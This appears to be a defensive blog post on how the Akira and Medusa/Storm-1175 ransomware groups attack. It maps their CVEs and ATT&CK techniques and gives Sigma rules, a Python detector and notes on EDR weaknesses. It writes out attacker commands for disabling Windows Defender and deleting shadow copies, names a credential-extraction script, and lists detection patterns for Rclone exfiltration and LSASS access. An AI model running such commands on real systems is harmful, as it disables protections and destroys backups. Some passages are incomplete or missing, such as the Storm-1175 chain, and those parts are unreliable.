Ransomware in 60 minutes: how Akira and Medusa/Storm-1175 accelerated attacks and how to detect them

Depov

According to the CrowdStrike Global Threat Report 2025, the average time from initial access to lateral movement in 2024 was 62 minutes. A year earlier it was 84. The record is 51 seconds from foothold to movement across the network. Fifty-one seconds. Two groups set this pace: Akira, with playbook attacks through VPN devices, and Storm-1175, the operator of the Medusa RaaS, which, according to Microsoft Threat Intelligence, deploys encryption in under 24 hours using zero-days in web applications. According to ransomware.live, in the first week of June 2026 alone Akira published data from 9 new victims, from manufacturing companies (T/CCI Manufacturing, NSPA) to financial services and the hotel business. Below is an analysis of the attack chain of both groups with references to verified CVEs and MITRE ATT&CK, specific Sigma rules, and a checklist that makes sense on such a timeline.
Why ransomware groups attack at speed
Speed is a direct payout multiplier for a ransomware operator. The shorter the time from initial access to impact (time-to-ransom), the less chance the SOC has to notice the anomaly and break the kill chain. According to Verizon DBIR 2025, the median ransom is $46,000; the maximum recorded is $75 million.

Three factors drive the acceleration trend:
1. EDR/XDR maturity is growing: with a long dwell time, defenders have more chances to detect. Groups like Storm-1175 deliberately compress the window to hours, slipping under the response threshold.
2. Post-exploitation automation: RMM tools (AnyDesk, Atera, ConnectWise ScreenConnect), Cloudflare tunnels and credential-harvesting scripts let the kill chain stages run in parallel. One operator now does what previously took a team.
3. Double extortion: exfiltration happens before encryption. Even if the victim restores from backups, the threat of publishing the data remains a lever of pressure.
For pentesters and security engineers the conclusion is direct: if your mean time to respond (MTTR) exceeds 4 hours, both groups will finish the job before the first alert. According to IBM X-Force, the average time between CVE publication and patch deployment in organizations is 29 months. Twenty-nine. Akira and Storm-1175 use CISA KEV entries that are being exploited in the wild right now.
Akira ransomware kill chain: from VPN to encryption
According to public DFIR reports, Akira works by a playbook with a clear sequence of stages. The group is associated with the Conti ecosystem (similarity of payload code, template TTPs). The model is double extortion: exfiltration, encryption, ransom demand.
Initial access and privilege escalation
[Applicable: external pentest; legacy and modern infrastructure with VPN without MFA]

The main vector is an SSL VPN device without multi-factor authentication. The evolution of initial access over two years:

2023–2024: Cisco ASA. Two CVEs chained together:
• CVE-2023-20269 (CVSS 5.0, Medium; CWE-288 Authentication Bypass, CWE-863 Incorrect Authorization) allows an unauthenticated attacker to brute-force accounts, and an authenticated one to establish an unauthorized clientless SSL VPN session on Cisco ASA and Firepower Threat Defense. In CISA KEV since September 2023, marked as used in ransomware campaigns.
• CVE-2020-3259 (CVSS 7.5, High; CWE-200 Information Disclosure): disclosure of memory contents via the Cisco ASA/FTD web interface. The attacker obtains sensitive data, including credentials, without authentication. EPSS 0.6973 (Top 5%). CISA KEV since February 2024.
Affects SonicWall Gen 5, Gen 6 and Gen 7 (SonicOS 7.0.1-5035 and earlier). CISA KEV since September 2024.

After obtaining VPN access, Akira goes after Veeam for privilege escalation:
• CVE-2023-27532 (CVSS 7.5, High; CWE-306 Missing Authentication for Critical Function): extraction of encrypted credentials from the Veeam Backup & Replication configuration. This data often includes domain admin accounts. EPSS 0.8381 (Top 1%, an extremely high probability of exploitation). The Veeam-Get-Creds.ps1 script pulls the passwords in cleartext from the SQL database.
• CVE-2024-40711 (CVSS 9.8, CWE-502 Deserialization of Untrusted Data): unauthenticated RCE via deserialization in Veeam Backup & Replication. EPSS 0.7046 (Top 5%). CISA KEV since October 2024.
Both Veeam vulnerabilities are classic broken access control (OWASP A01): access to critical functions without proper authentication. VPN devices left unpatched for months are a typical example of security misconfiguration (OWASP A07). Nothing new, but it works reliably.
Lateral movement, evasion and ransomware impact
[Applicable: internal pentest; infrastructure with Windows AD]

Reconnaissance: Netscan, Advanced Port Scanner and PowerShell scripts for collecting AD data are the core set seen in DFIR reports. Less often: PowerView, SharpHound, PingCastle.

Lateral movement: predominantly RDP (T1021.001, Remote Desktop Protocol); for ESXi and NAS, SSH. In some cases the attackers deployed their own VM inside the network to bypass endpoint protection (an elegant move, I must admit). Tools: NetExec, PsExec, Impacket atexec.py.

C2: mainly AnyDesk and OpenSSH. Isolated cases: Ligolo-ng, Cobalt Strike. The bet on legitimate RMM creates the key detection problem: the attacker's AnyDesk is indistinguishable from the IT department's AnyDesk. And it's not a bug, it's a feature of their approach.

Evasion (T1685, Disable or Modify Tools): manual shutdown of AV/EDR. Windows Defender is often switched off via Set-MpPreference -DisableRealtimeMonitoring $true or by modifying the DisableAntiSpyware registry value.

Exfiltration (T1560.001, Archive via Utility): mainly WinRAR, less often 7-Zip. Transfer: WinSCP, FileZilla, Rclone. The shortest recorded exfiltration took less than three hours.

Impact (T1486, Data Encrypted for Impact; T1490, Inhibit System Recovery): deliberate destruction of backups: vssadmin delete shadows /all /quiet, disk formatting. VMDK/VHDX encryption at the hypervisor level. Payload: w.exe, akira.exe, locker.exe. File extension .akira. Early versions (2023) contained a cryptographic error, a single ChaCha20/8 key for all files on a host, which allowed Avast to create a decryptor. In current samples this mistake has most likely already been fixed.
Storm-1175 kill chain: zero-day and Medusa ransomware in 24 hours

Three intersections, three detection points: Rclone, disabling of protective solutions, deletion of shadow copies.
Sigma rules for ransomware compromise indicators
Rclone exfiltration detection: used by both Akira and Storm-1175. Rclone on servers where the IT department did not install the utility is a compromise indicator.
```yaml
title: Rclone Exfiltration - Akira/Storm-1175
logsource:
  category: process_creation
  product: windows
detection:
  sel_img:
    Image|endswith: '\rclone.exe'
  sel_cmd:
    CommandLine|contains|any:
      - 'sync'
      - 'copy'
      - ':s3:'
      - ':mega:'
  condition: sel_img and sel_cmd
level: high
```
Limitation: if IT uses Rclone for legitimate backups, you will need an allow-list on the installation path and the target storage. Without filtering there will be false positives.

Shadow copy deletion detection: the last frontier before encryption (T1490, Inhibit System Recovery). If this alert fires, there are minutes left until encryption.
```yaml
title: Shadow Copy Deletion - Pre-Encryption
logsource:
  category: process_creation
  product: windows
detection:
  sel_vss:
    CommandLine|contains|all:
      - 'vssadmin'
      - 'delete'
      - 'shadows'
  sel_wmic:
    CommandLine|contains|all:
      - 'shadowcopy'
      - 'delete'
  condition: sel_vss or sel_wmic
level: critical
```
Limitation: legitimate removal of shadow copies when disk space runs out does happen, but extremely rarely with the parameters /all /quiet.

Additionally worth monitoring: access to LSASS with GrantedAccess 0x1010 or 0x1FFFFF (Sysmon Event ID 10), mass creation of local accounts with addition to the Administrators group, and modification of the DisableAntiSpyware registry value.
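Added example, not code from the original post: a small Python matcher that applies the post's Rclone, shadow-copy and LSASS indicators to constructed Windows process events, including the path-plus-remote allow-list that the Rclone rule's limitation calls for. The allowed Rclone install path and remote name are assumed placeholders, and the sample events are constructed.

```python
# Added example (not from the original post): applies the post's three indicators, Rclone
# exfiltration, shadow-copy deletion and LSASS access, to constructed Sysmon-style events.
# Constructed sample telemetry (not real logs); event_id follows Sysmon: 1 = process create, 10 = process access.
EVENTS = [
    {"event_id": 1, "image": r"C:\Users\svc\Downloads\rclone.exe",
     "cmd": r"rclone.exe copy D:\Shares\Finance :s3:exfil-bucket --transfers 32"},
    {"event_id": 1, "image": r"C:\Program Files\Rclone\rclone.exe",
     "cmd": r"rclone.exe sync D:\Backups backup:nightly"},          # IT-owned install, allow-listed
    {"event_id": 1, "image": r"C:\Windows\System32\vssadmin.exe",
     "cmd": "vssadmin delete shadows /all /quiet"},
    {"event_id": 1, "image": r"C:\Windows\System32\wbem\WMIC.exe",
     "cmd": "wmic shadowcopy delete"},
    {"event_id": 10, "source_image": r"C:\Windows\Temp\procdump.exe",
     "target_image": r"C:\Windows\System32\lsass.exe", "granted_access": "0x1FFFFF"},
    {"event_id": 10, "source_image": r"C:\Windows\System32\csrss.exe",
     "target_image": r"C:\Windows\System32\lsass.exe", "granted_access": "0x1400"},
]

RCLONE_ALLOWED_PATHS = ("c:\\program files\\rclone\\",)   # assumed IT install path (placeholder)
RCLONE_ALLOWED_REMOTES = ("backup:",)                      # assumed IT-managed remote name (placeholder)
RCLONE_KEYWORDS = ("sync", "copy", ":s3:", ":mega:")       # same keyword list as the Sigma rule
LSASS_SUSPICIOUS_ACCESS = {0x1010, 0x1FFFFF}               # GrantedAccess values named in the post

def classify(ev):
    """Return the indicator name an event matches, or None if it looks benign."""
    if ev["event_id"] == 1:
        img, cmd = ev["image"].lower(), ev["cmd"].lower()
        if img.endswith("\\rclone.exe") and any(k in cmd for k in RCLONE_KEYWORDS):
            # Suppress only when BOTH the install path and the remote are IT-sanctioned.
            trusted = img.startswith(RCLONE_ALLOWED_PATHS) and any(r in cmd for r in RCLONE_ALLOWED_REMOTES)
            return None if trusted else "rclone_exfiltration"
        if all(k in cmd for k in ("vssadmin", "delete", "shadows")) or all(k in cmd for k in ("shadowcopy", "delete")):
            # /all /quiet is the ransomware-typical form; flag it separately for prioritisation.
            quiet = "/all" in cmd and "/quiet" in cmd
            return "shadow_copy_deletion_all_quiet" if quiet else "shadow_copy_deletion"
    elif ev["event_id"] == 10 and ev["target_image"].lower().endswith("\\lsass.exe"):
        if int(ev["granted_access"], 16) in LSASS_SUSPICIOUS_ACCESS:
            return "lsass_access"
    return None

def triage(events):
    """Group matched indicators by the image that triggered them."""
    hits = {}
    for ev in events:
        name = classify(ev)
        if name:
            hits.setdefault(name, []).append(ev.get("image") or ev.get("source_image"))
    return hits
```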
Where detection breaks: analysis by EDR vendor
Detection effectiveness depends critically on the product and its configuration. The generalization "EDR will catch it" is an empty phrase without vendor specifics:

CrowdStrike Falcon: behavioral analytics detects mass encryption and vssadmin delete shadows. Problem: AnyDesk as C2. Falcon sees a legitimately signed binary, so detection only works with a baseline of "AnyDesk is not expected on this host". When the agent is shut down (Akira does this regularly), Falcon may not have time to send telemetry if tamper protection is not enabled.

Elastic 8.x+ with kernel ETW-TI: strong LSASS protection; detects direct dumping via Task Manager and blocks Mimikatz. Weakness: RMM-based C2 (Atera, ConnectWise) generates network traffic indistinguishable from routine administration without allow-lists.

SentinelOne: the behavioral engine catches mass renaming and encryption of files in real time. Vulnerability: if the attacker disables the agent using the service passphrase (obtained from compromised AD credentials), protection is neutralized before encryption starts.

The common problem for all three: both groups first extinguish the defenses, then encrypt. If an EDR agent can be deactivated with local admin rights without confirmation from the cloud console (tamper protection disabled or misconfigured), the kill chain is clear.